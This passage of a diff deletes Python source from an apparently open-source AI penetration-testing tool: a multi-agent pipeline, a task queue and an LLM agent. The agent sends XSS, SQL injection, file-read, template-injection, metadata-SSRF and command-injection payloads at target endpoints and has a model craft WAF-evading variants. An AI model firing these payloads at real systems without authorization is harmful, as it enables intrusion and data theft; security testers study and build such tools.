budget_allocation=budget_splits.get("recon", 0.20),
budget=self.budget, request_engine=self.request_engine,
),
"exploit": spec.ExploitAgent(
llm=self.llm, memory=self.memory,
budget_allocation=budget_splits.get("exploit", 0.35),
budget=self.budget, request_engine=self.request_engine,
),
"validator": spec.ValidatorAgent(
llm=self.llm, memory=self.memory,
budget_allocation=budget_splits.get("validator", 0.20),
budget=self.budget, request_engine=self.request_engine,
),
"cve_hunter": spec.CVEHunterAgent(
llm=self.llm, memory=self.memory,
budget_allocation=budget_splits.get("cve_hunter", 0.10),
budget=self.budget, request_engine=self.request_engine,
),
"reporter": spec.ReportAgent(
llm=self.llm, memory=self.memory,
budget_allocation=budget_splits.get("reporter", 0.15),
budget=self.budget,
),
}
def set_progress_callback(self, callback):
"""Set callback for progress updates: callback(phase, pct, message)."""
self._progress_callback = callback
def _progress(self, phase: str, pct: float, message: str):
"""Report progress."""
self._phase = phase
if self._progress_callback:
try:
self._progress_callback(phase, pct, message)
except Exception:
pass
async def run(
self,
target: str,
recon_data: Any = None,
initial_context: Dict = None,
) -> Dict:
"""Run the full multi-agent pipeline.
Args:
target: Target URL
recon_data: Existing ReconData object (if available)
initial_context: Additional context (headers, body, technologies)
Returns:
Dict with all findings, agent results, and statistics.
"""
self._start_time = time.time()
self._cancel_event.clear()
context = initial_context or {}
context["target"] = target
# Extract basic info from recon_data
if recon_data:
context.setdefault("headers", getattr(recon_data, "headers", {}))
context.setdefault("body", getattr(recon_data, "body", ""))
context.setdefault("technologies",
getattr(recon_data, "technologies", []))
context.setdefault("endpoints",
getattr(recon_data, "endpoints", []))
all_findings = []
pipeline_results = {}
# ── Phase 1: Intelligence Gathering (Parallel) ──
self._progress("phase1_intel", 0.0, "Starting intelligence gathering")
if self._cancel_event.is_set():
return self._build_result(all_findings, pipeline_results)
phase1_tasks = []
if "recon" in self._agents:
phase1_tasks.append(
("recon", self._agents["recon"].execute(context))
)
if "cve_hunter" in self._agents:
phase1_tasks.append(
("cve_hunter", self._agents["cve_hunter"].execute(context))
)
if phase1_tasks:
results = await asyncio.gather(
*[task for _, task in phase1_tasks],
return_exceptions=True,
)
for (name, _), res in zip(phase1_tasks, results):
if isinstance(res, Exception):
logger.error(f"Phase 1 agent {name} failed: {res}")
pipeline_results[name] = AgentResult(
agent_name=name, status="failed", error=str(res)
)
else:
pipeline_results[name] = res
all_findings.extend(res.findings)
# Merge discovered endpoints into context
if name == "recon" and res.data.get("discovered_endpoints"):
existing = context.get("endpoints", [])
context["endpoints"] = list(set(
existing + res.data["discovered_endpoints"]
))
if name == "recon" and res.data.get("version_findings"):
context["versions"] = res.data["version_findings"]
self._progress("phase1_intel", 0.30,
f"Intel complete: {len(context.get('endpoints', []))} endpoints")
# ── Phase 2: Exploitation (Sequential) ──
if self._cancel_event.is_set():
return self._build_result(all_findings, pipeline_results)
self._progress("phase2_exploit", 0.30, "Starting exploitation phase")
if "exploit" in self._agents:
exploit_result = await self._agents["exploit"].execute(context)
pipeline_results["exploit"] = exploit_result
all_findings.extend(exploit_result.findings)
self._progress("phase2_exploit", 0.65,
f"Exploitation complete: {len(all_findings)} findings")
# ── Phase 3: Validation + Reporting (Parallel) ──
if self._cancel_event.is_set():
return self._build_result(all_findings, pipeline_results)
self._progress("phase3_validate", 0.65, "Starting validation and reporting")
phase3_context = {**context, "findings": all_findings}
phase3_tasks = []
if "validator" in self._agents and all_findings:
phase3_tasks.append(
("validator", self._agents["validator"].execute(phase3_context))
)
if "reporter" in self._agents and all_findings:
report_ctx = {**phase3_context, "recon_data": recon_data}
phase3_tasks.append(
("reporter", self._agents["reporter"].execute(report_ctx))
)
if phase3_tasks:
results = await asyncio.gather(
*[task for _, task in phase3_tasks],
return_exceptions=True,
)
for (name, _), res in zip(phase3_tasks, results):
if isinstance(res, Exception):
logger.error(f"Phase 3 agent {name} failed: {res}")
pipeline_results[name] = AgentResult(
agent_name=name, status="failed", error=str(res)
)
else:
pipeline_results[name] = res
# Validator may filter findings
if name == "validator" and res.findings:
all_findings = res.findings
self._progress("complete", 1.0,
f"Pipeline complete: {len(all_findings)} validated findings")
return self._build_result(all_findings, pipeline_results)
def _build_result(
self,
findings: List,
agent_results: Dict[str, AgentResult],
) -> Dict:
"""Build final pipeline result."""
elapsed = time.time() - self._start_time if self._start_time else 0
total_tokens = sum(
r.tokens_used for r in agent_results.values()
if isinstance(r, AgentResult)
)
total_tasks = sum(
r.tasks_completed for r in agent_results.values()
if isinstance(r, AgentResult)
)
return {
"findings": findings,
"findings_count": len(findings),
"agent_results": {
name: {
"status": r.status,
"findings_count": len(r.findings),
"tasks_completed": r.tasks_completed,
"tokens_used": r.tokens_used,
"duration": round(r.duration, 1),
"error": r.error,
}
for name, r in agent_results.items()
if isinstance(r, AgentResult)
},
"total_tokens": total_tokens,
"total_tasks": total_tasks,
"duration": round(elapsed, 1),
"phase": self._phase,
}
def cancel(self):
"""Cancel all running agents."""
self._cancel_event.set()
for agent in self._agents.values():
agent.cancel()
def get_agents_status(self) -> List[Dict]:
"""Get status of all agents for dashboard."""
return [agent.get_status() for agent in self._agents.values()]
async def reason_about_handoff(
self,
current_agent: str,
result: AgentResult,
) -> Optional[str]:
"""Use AI to decide which agent should handle next.
Falls back to explicit handoff_to in AgentResult.
"""
if result.handoff_to:
return result.handoff_to
if not self.llm or not hasattr(self.llm, "generate"):
return None
try:
prompt = f"""Given the output of the {current_agent} agent:
- Status: {result.status}
- Findings: {len(result.findings)}
- Data keys: {list(result.data.keys())}
Which agent should handle the next step?
Options: recon, exploit, validator, cve_hunter, reporter, none
Reply with ONLY the agent name."""
answer = await self.llm.generate(prompt)
if answer:
answer = answer.strip().lower()
if answer in self._agents:
return answer
except Exception:
pass
return None
-372
View File
@@ -1,372 +0,0 @@
"""
NeuroSploit v3 - Agent Task Manager
Sub-task spawning and tracking system with priority queue.
Enables concurrent task execution with dependency awareness.
Inspired by CAI framework's agent-as-tool and task delegation patterns.
"""
import asyncio
import uuid
import time
from dataclasses import dataclass, field
from typing import Dict, List, Any, Optional, Callable, Awaitable
from enum import Enum
class TaskType(Enum):
"""Types of agent sub-tasks."""
TEST_ENDPOINT = "test_endpoint"
VERIFY_FINDING = "verify_finding"
SEARCH_CVE = "search_cve"
GENERATE_POC = "generate_poc"
CHAIN_EXPLORE = "chain_explore"
DEEP_TEST = "deep_test"
RECON_EXPAND = "recon_expand"
BANNER_CHECK = "banner_check"
MUTATE_TEST = "mutate_test"
class TaskStatus(Enum):
"""Task lifecycle states."""
PENDING = "pending"
RUNNING = "running"
COMPLETED = "completed"
FAILED = "failed"
CANCELLED = "cancelled"
# Priority levels (lower number = higher priority)
PRIORITY_CRITICAL = 1 # RCE, auth bypass, chain exploitation
PRIORITY_HIGH = 2 # Confirmed reflection, SQL error, SSRF indicators
PRIORITY_MEDIUM = 3 # Standard vulnerability testing
PRIORITY_LOW = 4 # Info disclosure, header checks
PRIORITY_INFO = 5 # Enhancement, non-critical recon
@dataclass
class AgentTask:
"""A discrete task that can be assigned to the agent or a specialist."""
id: str = ""
task_type: str = TaskType.TEST_ENDPOINT.value
priority: int = PRIORITY_MEDIUM
target: str = ""
parameters: Dict = field(default_factory=dict)
status: str = TaskStatus.PENDING.value
result: Any = None
error: str = ""
created_at: float = 0.0
started_at: float = 0.0
completed_at: float = 0.0
source: str = "" # What created this task (e.g., "chain_engine", "reasoning")
def __post_init__(self):
if not self.id:
self.id = uuid.uuid4().hex[:12]
if not self.created_at:
self.created_at = time.time()
def __lt__(self, other):
"""For PriorityQueue comparison — lower priority number = higher priority."""
if not isinstance(other, AgentTask):
return NotImplemented
return self.priority < other.priority
@property
def age_seconds(self) -> float:
return time.time() - self.created_at
@property
def duration_seconds(self) -> Optional[float]:
if self.started_at and self.completed_at:
return self.completed_at - self.started_at
return None
class AgentTaskManager:
"""Manages agent sub-tasks with priority queue and concurrent execution.
Tasks are submitted with priorities and processed concurrently.
Supports task cancellation, status tracking, and result collection.
"""
MAX_QUEUE_SIZE = 500
MAX_COMPLETED = 200
def __init__(self, max_concurrent: int = 5):
self.max_concurrent = max_concurrent
self._queue: asyncio.PriorityQueue = asyncio.PriorityQueue(
maxsize=self.MAX_QUEUE_SIZE
)
self._running: Dict[str, AgentTask] = {}
self._completed: List[AgentTask] = []
self._failed: List[AgentTask] = []
self._cancelled = False
self._semaphore = asyncio.Semaphore(max_concurrent)
self._total_submitted = 0
self._total_completed = 0
self._total_failed = 0
# ── Task Submission ──
async def submit(self, task: AgentTask) -> str:
"""Submit task to priority queue. Returns task ID."""
if self._cancelled:
return ""
if self._queue.full():
# Evict lowest-priority pending task
# Note: PriorityQueue doesn't support removal, so we skip
return ""
try:
self._queue.put_nowait(task)
self._total_submitted += 1
return task.id
except asyncio.QueueFull:
return ""
def submit_sync(self, task: AgentTask) -> str:
"""Synchronous submit (for use in non-async contexts)."""
try:
self._queue.put_nowait(task)
self._total_submitted += 1
return task.id
except (asyncio.QueueFull, Exception):
return ""
async def submit_batch(self, tasks: List[AgentTask]) -> List[str]:
"""Submit multiple tasks at once."""
ids = []
for task in tasks:
tid = await self.submit(task)
if tid:
ids.append(tid)
return ids
# ── Task Execution ──
async def run_tasks(self, executor: Callable[[AgentTask], Awaitable[Any]],
cancel_check: Optional[Callable[[], bool]] = None,
progress_callback: Optional[Callable[[Dict], Awaitable]] = None
) -> List[AgentTask]:
"""Process queue with concurrent execution.
Args:
executor: Async function that executes a single task
cancel_check: Optional function that returns True to stop
progress_callback: Optional async callback for progress updates
Returns:
List of completed tasks
"""
workers = []
completed_in_run = []
async def worker():
while not self._cancelled:
if cancel_check and cancel_check():
break
try:
task = await asyncio.wait_for(
self._queue.get(), timeout=2.0
)
except asyncio.TimeoutError:
# Check if queue is permanently empty
if self._queue.empty():
break
continue
if self._cancelled or (cancel_check and cancel_check()):
break
async with self._semaphore:
task.status = TaskStatus.RUNNING.value
task.started_at = time.time()
self._running[task.id] = task
try:
result = await executor(task)
task.result = result
task.status = TaskStatus.COMPLETED.value
task.completed_at = time.time()
self._total_completed += 1
completed_in_run.append(task)
# Bounded completed list
self._completed.append(task)
if len(self._completed) > self.MAX_COMPLETED:
self._completed = self._completed[-self.MAX_COMPLETED:]
except Exception as e:
task.error = str(e)
task.status = TaskStatus.FAILED.value
task.completed_at = time.time()
self._total_failed += 1
self._failed.append(task)
finally:
self._running.pop(task.id, None)
if progress_callback:
try:
await progress_callback(self.get_status())
except Exception:
pass
# Spawn workers
for _ in range(min(self.max_concurrent, max(1, self._queue.qsize()))):
workers.append(asyncio.create_task(worker()))
if workers:
await asyncio.gather(*workers, return_exceptions=True)
return completed_in_run
async def drain(self, executor: Callable[[AgentTask], Awaitable[Any]],
cancel_check: Optional[Callable[[], bool]] = None,
timeout: float = 300.0) -> List[AgentTask]:
"""Run all queued tasks with a timeout."""
try:
return await asyncio.wait_for(
self.run_tasks(executor, cancel_check),
timeout=timeout,
)
except asyncio.TimeoutError:
self.cancel()
return list(self._completed[-50:])
# ── Task Control ──
def cancel(self):
"""Cancel all pending tasks."""
self._cancelled = True
# Drain queue
while not self._queue.empty():
try:
task = self._queue.get_nowait()
task.status = TaskStatus.CANCELLED.value
except asyncio.QueueEmpty:
break
def reset(self):
"""Reset for new use."""
self._cancelled = False
self._queue = asyncio.PriorityQueue(maxsize=self.MAX_QUEUE_SIZE)
self._running.clear()
# ── Status & Queries ──
def get_status(self) -> Dict:
"""Return task manager status for logging/dashboard."""
return {
"queued": self._queue.qsize(),
"running": len(self._running),
"completed": self._total_completed,
"failed": self._total_failed,
"total_submitted": self._total_submitted,
"cancelled": self._cancelled,
}
@property
def is_empty(self) -> bool:
return self._queue.empty() and not self._running
@property
def pending_count(self) -> int:
return self._queue.qsize()
@property
def running_count(self) -> int:
return len(self._running)
def get_completed_results(self, task_type: Optional[str] = None) -> List[Any]:
"""Get results from completed tasks, optionally filtered by type."""
tasks = self._completed
if task_type:
tasks = [t for t in tasks if t.task_type == task_type]
return [t.result for t in tasks if t.result is not None]
def get_failed_tasks(self) -> List[AgentTask]:
"""Get failed tasks for retry or debugging."""
return list(self._failed[-50:])
# ── Task Factory Helpers ──
def create_test_task(url: str, vuln_type: str, params: Dict = None,
priority: int = PRIORITY_MEDIUM,
source: str = "") -> AgentTask:
"""Create a test_endpoint task."""
return AgentTask(
task_type=TaskType.TEST_ENDPOINT.value,
priority=priority,
target=url,
parameters={
"vuln_type": vuln_type,
"params": params or {},
},
source=source,
)
def create_cve_task(software: str, version: str,
priority: int = PRIORITY_HIGH) -> AgentTask:
"""Create a search_cve task."""
return AgentTask(
task_type=TaskType.SEARCH_CVE.value,
priority=priority,
target=f"{software}/{version}",
parameters={
"software": software,
"version": version,
},
source="cve_hunter",
)
def create_chain_task(finding_type: str, finding_url: str,
chain_target: Dict,
priority: int = PRIORITY_HIGH) -> AgentTask:
"""Create a chain_explore task."""
return AgentTask(
task_type=TaskType.CHAIN_EXPLORE.value,
priority=priority,
target=finding_url,
parameters={
"source_vuln": finding_type,
"chain_target": chain_target,
},
source="chain_engine",
)
def create_deep_test_task(url: str, vuln_type: str, param: str,
mutation_context: Dict = None,
priority: int = PRIORITY_HIGH) -> AgentTask:
"""Create a deep_test task (re-test with mutations)."""
return AgentTask(
task_type=TaskType.DEEP_TEST.value,
priority=priority,
target=url,
parameters={
"vuln_type": vuln_type,
"param": param,
"mutation_context": mutation_context or {},
},
source="payload_mutator",
)
def create_poc_task(finding_id: str, finding_type: str,
priority: int = PRIORITY_LOW) -> AgentTask:
"""Create a generate_poc task."""
return AgentTask(
task_type=TaskType.GENERATE_POC.value,
priority=priority,
target=finding_id,
parameters={"vuln_type": finding_type},
source="exploit_generator",
)
@@ -1,889 +0,0 @@
"""
NeuroSploit v3 - AI Offensive Security Agent
This is a TRUE AI AGENT that:
1. Uses LLM for INTELLIGENT vulnerability testing (not blind payloads)
2. Analyzes responses with AI to confirm vulnerabilities (no false positives)
3. Uses recon data to inform testing strategy
4. Accepts custom .md prompt files
5. Generates real PoC code and exploitation steps
AUTHORIZATION: This is an authorized penetration testing tool.
All actions are performed with explicit permission.
"""
import asyncio
import aiohttp
import json
import re
import os
import sys
from typing import Dict, List, Any, Optional, Callable, Tuple
from dataclasses import dataclass, field
from datetime import datetime
from urllib.parse import urljoin, urlparse, parse_qs, urlencode, quote
from enum import Enum
from pathlib import Path
# Add parent path for imports
sys.path.insert(0, str(Path(__file__).parent.parent.parent))
try:
from core.llm_manager import LLMManager
except ImportError:
LLMManager = None
class AgentAction(Enum):
"""Actions the agent can take"""
DISCOVER = "discover"
TEST = "test"
EXPLOIT = "exploit"
CHAIN = "chain"
REPORT = "report"
PIVOT = "pivot"
@dataclass
class Finding:
"""A vulnerability finding with exploitation details"""
vuln_type: str
severity: str
endpoint: str
payload: str
evidence: str
exploitable: bool
confidence: str = "high" # high, medium, low
exploitation_steps: List[str] = field(default_factory=list)
poc_code: str = ""
impact: str = ""
chained_with: List[str] = field(default_factory=list)
raw_request: str = ""
raw_response: str = ""
llm_analysis: str = ""
@dataclass
class AgentState:
"""Current state of the AI agent"""
target: str
discovered_endpoints: List[str] = field(default_factory=list)
discovered_params: Dict[str, List[str]] = field(default_factory=dict)
technologies: List[str] = field(default_factory=list)
findings: List[Finding] = field(default_factory=list)
tested_payloads: Dict[str, List[str]] = field(default_factory=dict)
session_cookies: Dict[str, str] = field(default_factory=dict)
auth_tokens: List[str] = field(default_factory=list)
waf_detected: bool = False
waf_type: str = ""
current_phase: str = "recon"
actions_taken: List[str] = field(default_factory=list)
recon_context: Optional[Dict] = None
class AIPentestAgent:
"""
Autonomous AI Agent for Offensive Security Testing
This agent uses LLM to make INTELLIGENT decisions:
- What to test based on recon data
- How to craft context-aware payloads
- How to analyze responses to CONFIRM vulnerabilities
- How to chain attacks for maximum impact
NO FALSE POSITIVES - Every finding is confirmed by AI analysis.
"""
def __init__(
self,
target: str,
llm_manager: Optional[Any] = None,
log_callback: Optional[Callable] = None,
auth_headers: Optional[Dict] = None,
max_depth: int = 5,
prompt_file: Optional[str] = None,
recon_context: Optional[Dict] = None,
config: Optional[Dict] = None
):
self.target = target
self.llm_manager = llm_manager
self.log = log_callback or self._default_log
self.auth_headers = auth_headers or {}
self.max_depth = max_depth
self.prompt_file = prompt_file
self.custom_prompt = None
self.config = config or {}
self.state = AgentState(target=target, recon_context=recon_context)
self.session: Optional[aiohttp.ClientSession] = None
# Load custom prompt if provided
if prompt_file:
self._load_custom_prompt(prompt_file)
# Initialize LLM manager if not provided
if not self.llm_manager and LLMManager and config:
try:
self.llm_manager = LLMManager(config)
except Exception as e:
print(f"Warning: Could not initialize LLM manager: {e}")
# Base payloads - LLM will enhance these based on context
self.base_payloads = self._load_base_payloads()
async def _default_log(self, level: str, message: str):
print(f"[{level.upper()}] {message}")
def _load_custom_prompt(self, prompt_file: str):
"""Load custom prompt from .md file"""
try:
path = Path(prompt_file)
if not path.exists():
# Try in prompts directory
path = Path("prompts") / prompt_file
if not path.exists():
path = Path("prompts/md_library") / prompt_file
if path.exists():
content = path.read_text()
self.custom_prompt = content
print(f"[+] Loaded custom prompt from: {path}")
else:
print(f"[!] Prompt file not found: {prompt_file}")
except Exception as e:
print(f"[!] Error loading prompt file: {e}")
def _load_base_payloads(self) -> Dict[str, List[str]]:
"""Load base attack payloads - LLM will enhance these"""
return {
"xss": [
"<script>alert(1)</script>",
"\"><script>alert(1)</script>",
"'-alert(1)-'",
"<img src=x onerror=alert(1)>",
],
"sqli": [
"'", "\"", "' OR '1'='1", "1' AND '1'='1",
"' UNION SELECT NULL--", "1' AND SLEEP(3)--",
],
"lfi": [
"../../../etc/passwd",
"....//....//etc/passwd",
"php://filter/convert.base64-encode/resource=index.php",
],
"ssti": [
"{{7*7}}", "${7*7}", "<%= 7*7 %>",
"{{config}}", "{{self.__class__}}",
],
"ssrf": [
"http://127.0.0.1", "http://localhost",
"http://169.254.169.254/latest/meta-data/",
],
"rce": [
"; id", "| id", "$(id)", "`id`",
],
}
async def __aenter__(self):
connector = aiohttp.TCPConnector(ssl=False, limit=10)
timeout = aiohttp.ClientTimeout(total=30)
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"}
headers.update(self.auth_headers)
self.session = aiohttp.ClientSession(connector=connector, timeout=timeout, headers=headers)
return self
async def __aexit__(self, *args):
if self.session:
await self.session.close()
async def run(self) -> Dict[str, Any]:
"""
Main agent loop - Think, Act, Observe, Adapt
Uses LLM for intelligent decision making at each step.
"""
await self.log("info", "=" * 60)
await self.log("info", "AI OFFENSIVE SECURITY AGENT ACTIVATED")
await self.log("info", "=" * 60)
await self.log("info", f"Target: {self.target}")
await self.log("info", f"Mode: LLM-POWERED INTELLIGENT TESTING")
if self.custom_prompt:
await self.log("info", f"Custom prompt loaded: {len(self.custom_prompt)} chars")
await self.log("info", "")
try:
# Phase 1: Reconnaissance (use recon data if available)
await self.log("info", "[PHASE 1] RECONNAISSANCE")
await self._recon_phase()
# Phase 2: LLM-Powered Vulnerability Testing
await self.log("info", "")
await self.log("info", "[PHASE 2] INTELLIGENT VULNERABILITY TESTING")
await self._testing_phase()
# Phase 3: Exploitation (only confirmed vulnerabilities)
if self.state.findings:
await self.log("info", "")
await self.log("info", "[PHASE 3] EXPLOITATION")
await self._exploitation_phase()
# Phase 4: Attack Chaining
if len(self.state.findings) > 1:
await self.log("info", "")
await self.log("info", "[PHASE 4] ATTACK CHAINING")
await self._chaining_phase()
# Generate Report
await self.log("info", "")
await self.log("info", "[PHASE 5] REPORT GENERATION")
report = await self._generate_report()
return report
except Exception as e:
await self.log("error", f"Agent error: {str(e)}")
import traceback
traceback.print_exc()
return {"error": str(e), "findings": [f.__dict__ for f in self.state.findings]}
async def _recon_phase(self):
"""Reconnaissance - use existing recon data or perform basic discovery"""
# Use recon context if available
if self.state.recon_context:
await self.log("info", " Using provided recon context...")
await self._load_recon_context()
else:
await self.log("info", " Performing basic reconnaissance...")
await self._basic_recon()
await self.log("info", f" Found {len(self.state.discovered_endpoints)} endpoints")
await self.log("info", f" Found {sum(len(v) for v in self.state.discovered_params.values())} parameters")
await self.log("info", f" Technologies: {', '.join(self.state.technologies[:5]) or 'Unknown'}")
async def _load_recon_context(self):
"""Load data from recon context"""
ctx = self.state.recon_context
# Load endpoints from various recon sources
if ctx.get("data", {}).get("endpoints"):
self.state.discovered_endpoints.extend(ctx["data"]["endpoints"][:100])
if ctx.get("data", {}).get("urls"):
self.state.discovered_endpoints.extend(ctx["data"]["urls"][:100])
if ctx.get("data", {}).get("crawled_urls"):
self.state.discovered_endpoints.extend(ctx["data"]["crawled_urls"][:100])
# Load parameters
if ctx.get("data", {}).get("parameters"):
for param_data in ctx["data"]["parameters"]:
if isinstance(param_data, dict):
url = param_data.get("url", self.target)
params = param_data.get("params", [])
self.state.discovered_params[url] = params
elif isinstance(param_data, str):
self.state.discovered_params[self.target] = self.state.discovered_params.get(self.target, []) + [param_data]
# Load technologies
if ctx.get("data", {}).get("technologies"):
self.state.technologies.extend(ctx["data"]["technologies"])
# Load from attack surface
if ctx.get("attack_surface"):
surface = ctx["attack_surface"]
if surface.get("live_hosts"):
for host in surface.get("live_urls", [])[:50]:
if host not in self.state.discovered_endpoints:
self.state.discovered_endpoints.append(host)
# Deduplicate
self.state.discovered_endpoints = list(set(self.state.discovered_endpoints))
async def _basic_recon(self):
"""Perform basic reconnaissance when no recon data is available"""
# Fingerprint
await self._fingerprint_target()
# Discover common endpoints
common_paths = [
"/", "/login", "/admin", "/api", "/api/v1",
"/user", "/search", "/upload", "/config",
"/?id=1", "/?page=1", "/?q=test",
]
parsed = urlparse(self.target)
base_url = f"{parsed.scheme}://{parsed.netloc}"
for path in common_paths:
url = urljoin(base_url, path)
try:
async with self.session.get(url, allow_redirects=False) as resp:
if resp.status < 400 and resp.status != 404:
self.state.discovered_endpoints.append(url)
# Extract params
if "?" in url:
parsed_url = urlparse(url)
params = list(parse_qs(parsed_url.query).keys())
self.state.discovered_params[url] = params
except:
pass
async def _fingerprint_target(self):
"""Fingerprint the target"""
try:
async with self.session.get(self.target) as resp:
body = await resp.text()
headers = dict(resp.headers)
# Server detection
server = headers.get("Server", "")
if server:
self.state.technologies.append(f"Server: {server}")
# X-Powered-By
powered = headers.get("X-Powered-By", "")
if powered:
self.state.technologies.append(powered)
# Technology signatures
tech_sigs = {
"PHP": [".php", "PHPSESSID"],
"ASP.NET": [".aspx", "__VIEWSTATE"],
"Java": [".jsp", "JSESSIONID"],
"Python": ["django", "flask"],
"Node.js": ["express", "connect.sid"],
"WordPress": ["wp-content", "wp-includes"],
"Laravel": ["laravel", "XSRF-TOKEN"],
}
for tech, sigs in tech_sigs.items():
for sig in sigs:
if sig.lower() in body.lower() or sig in str(headers):
if tech not in self.state.technologies:
self.state.technologies.append(tech)
break
except Exception as e:
await self.log("debug", f"Fingerprint error: {e}")
async def _testing_phase(self):
"""LLM-powered vulnerability testing"""
# Determine what to test based on recon data
test_strategy = await self._get_test_strategy()
# Get endpoints to test
endpoints = self.state.discovered_endpoints[:20] or [self.target]
for endpoint in endpoints:
await self.log("info", f" Testing: {endpoint[:60]}...")
for vuln_type in test_strategy:
# Get LLM-enhanced payloads for this context
payloads = await self._get_smart_payloads(endpoint, vuln_type)
for payload in payloads[:5]:
result = await self._test_and_verify(endpoint, vuln_type, payload)
if result and result.get("confirmed"):
finding = Finding(
vuln_type=vuln_type,
severity=self._get_severity(vuln_type),
endpoint=endpoint,
payload=payload,
evidence=result.get("evidence", ""),
exploitable=result.get("exploitable", False),
confidence=result.get("confidence", "high"),
llm_analysis=result.get("analysis", ""),
raw_request=result.get("request", ""),
raw_response=result.get("response", "")[:2000],
impact=self._get_impact(vuln_type),
)
self.state.findings.append(finding)
await self.log("warning", f" [CONFIRMED] {vuln_type.upper()} - {result.get('confidence', 'high')} confidence")
break # Found vuln, move to next type
async def _get_test_strategy(self) -> List[str]:
"""Use LLM to determine what to test based on recon data"""
# Default strategy
default_strategy = ["xss", "sqli", "lfi", "ssti", "ssrf"]
if not self.llm_manager:
return default_strategy
try:
# Build context for LLM
context = {
"target": self.target,
"technologies": self.state.technologies,
"endpoints_count": len(self.state.discovered_endpoints),
"parameters_count": sum(len(v) for v in self.state.discovered_params.values()),
"sample_endpoints": self.state.discovered_endpoints[:5],
}
prompt = f"""Based on the following reconnaissance data, determine the most likely vulnerability types to test.
Target: {context['target']}
Technologies detected: {', '.join(context['technologies']) or 'Unknown'}
Endpoints found: {context['endpoints_count']}
Parameters found: {context['parameters_count']}
Sample endpoints: {context['sample_endpoints']}
Custom instructions: {self.custom_prompt[:500] if self.custom_prompt else 'None'}
Return a JSON array of vulnerability types to test, ordered by likelihood.
Valid types: xss, sqli, lfi, rce, ssti, ssrf, xxe, idor, open_redirect
Example: ["sqli", "xss", "lfi"]
IMPORTANT: Only return the JSON array, no other text."""
response = self.llm_manager.generate(prompt, "You are a penetration testing expert. Analyze recon data and suggest vulnerability tests.")
# Parse response
try:
# Find JSON array in response
match = re.search(r'\[.*?\]', response, re.DOTALL)
if match:
strategy = json.loads(match.group())
if isinstance(strategy, list) and len(strategy) > 0:
return strategy[:7]
except:
pass
except Exception as e:
await self.log("debug", f"LLM strategy error: {e}")
return default_strategy
async def _get_smart_payloads(self, endpoint: str, vuln_type: str) -> List[str]:
"""Get context-aware payloads from LLM"""
base = self.base_payloads.get(vuln_type, [])
if not self.llm_manager:
return base
try:
# Get endpoint context
params = self.state.discovered_params.get(endpoint, [])
techs = self.state.technologies
prompt = f"""Generate 3 specialized {vuln_type.upper()} payloads for this context:
Endpoint: {endpoint}
Parameters: {params}
Technologies: {techs}
WAF detected: {self.state.waf_detected} ({self.state.waf_type})
Requirements:
1. Payloads should be tailored to the detected technologies
2. If WAF detected, use evasion techniques
3. Include both basic and advanced payloads
Return ONLY a JSON array of payload strings.
Example: ["payload1", "payload2", "payload3"]"""
response = self.llm_manager.generate(prompt, "You are a security researcher. Generate effective but safe test payloads.")
try:
match = re.search(r'\[.*?\]', response, re.DOTALL)
if match:
smart_payloads = json.loads(match.group())
if isinstance(smart_payloads, list):
return smart_payloads + base
except:
pass
except Exception as e:
await self.log("debug", f"Smart payload error: {e}")
return base
async def _test_and_verify(self, endpoint: str, vuln_type: str, payload: str) -> Optional[Dict]:
"""Test a payload and use LLM to verify if it's a real vulnerability"""
try:
# Prepare request
parsed = urlparse(endpoint)
base_url = f"{parsed.scheme}://{parsed.netloc}{parsed.path}"
# Build params with payload
params = {}
if parsed.query:
for p in parsed.query.split("&"):
if "=" in p:
k, v = p.split("=", 1)
params[k] = payload
else:
test_params = self.state.discovered_params.get(endpoint, []) or ["id", "q", "search"]
for p in test_params[:3]:
params[p] = payload
# Send request
async with self.session.get(base_url, params=params, allow_redirects=False) as resp:
body = await resp.text()
status = resp.status
headers = dict(resp.headers)
# Build raw request for logging
raw_request = f"GET {resp.url}\n"
raw_request += "\n".join([f"{k}: {v}" for k, v in self.auth_headers.items()])
# First, do quick checks for obvious indicators
quick_result = self._quick_vuln_check(vuln_type, payload, body, status, headers)
if not quick_result.get("possible"):
return None
# If possible vulnerability, use LLM to confirm
if self.llm_manager:
confirmation = await self._llm_confirm_vulnerability(
vuln_type, payload, body[:3000], status, headers, endpoint
)
if confirmation.get("confirmed"):
return {
"confirmed": True,
"evidence": confirmation.get("evidence", quick_result.get("evidence", "")),
"exploitable": confirmation.get("exploitable", False),
"confidence": confirmation.get("confidence", "medium"),
"analysis": confirmation.get("analysis", ""),
"request": raw_request,
"response": body[:2000],
}
else:
# No LLM, use quick check result
if quick_result.get("high_confidence"):
return {
"confirmed": True,
"evidence": quick_result.get("evidence", ""),
"exploitable": True,
"confidence": "medium",
"analysis": "Confirmed by response analysis (no LLM)",
"request": raw_request,
"response": body[:2000],
}
except asyncio.TimeoutError:
if vuln_type == "sqli":
return {
"confirmed": True,
"evidence": "Request timeout - possible time-based SQL injection",
"exploitable": True,
"confidence": "medium",
"analysis": "Time-based blind SQLi detected",
}
except Exception as e:
await self.log("debug", f"Test error: {e}")
return None
def _quick_vuln_check(self, vuln_type: str, payload: str, body: str, status: int, headers: Dict) -> Dict:
"""Quick vulnerability check without LLM"""
result = {"possible": False, "high_confidence": False, "evidence": ""}
body_lower = body.lower()
if vuln_type == "xss":
# Check for exact payload reflection (unencoded)
if payload in body and "<" in payload:
result["possible"] = True
result["evidence"] = "XSS payload reflected without encoding"
# High confidence only if script tags execute
if "<script>" in payload.lower() and payload.lower() in body_lower:
result["high_confidence"] = True
elif vuln_type == "sqli":
sql_errors = [
"sql syntax", "mysql_", "sqlite_", "pg_query", "ora-",
"unterminated", "query failed", "database error",
"you have an error in your sql", "warning: mysql",
]
for error in sql_errors:
if error in body_lower:
result["possible"] = True
result["high_confidence"] = True
result["evidence"] = f"SQL error: {error}"
break
elif vuln_type == "lfi":
lfi_indicators = ["root:x:", "root:*:", "[boot loader]", "daemon:", "/bin/bash"]
for indicator in lfi_indicators:
if indicator.lower() in body_lower:
result["possible"] = True
result["high_confidence"] = True
result["evidence"] = f"File content: {indicator}"
break
elif vuln_type == "ssti":
if "49" in body and "7*7" in payload:
result["possible"] = True
result["high_confidence"] = True
result["evidence"] = "SSTI: 7*7=49 evaluated"
elif vuln_type == "rce":
rce_indicators = ["uid=", "gid=", "groups=", "/bin/", "/usr/"]
for indicator in rce_indicators:
if indicator in body_lower:
result["possible"] = True
result["high_confidence"] = True
result["evidence"] = f"Command output: {indicator}"
break
elif vuln_type == "ssrf":
ssrf_indicators = ["root:", "localhost", "internal", "meta-data", "169.254"]
for indicator in ssrf_indicators:
if indicator in body_lower:
result["possible"] = True
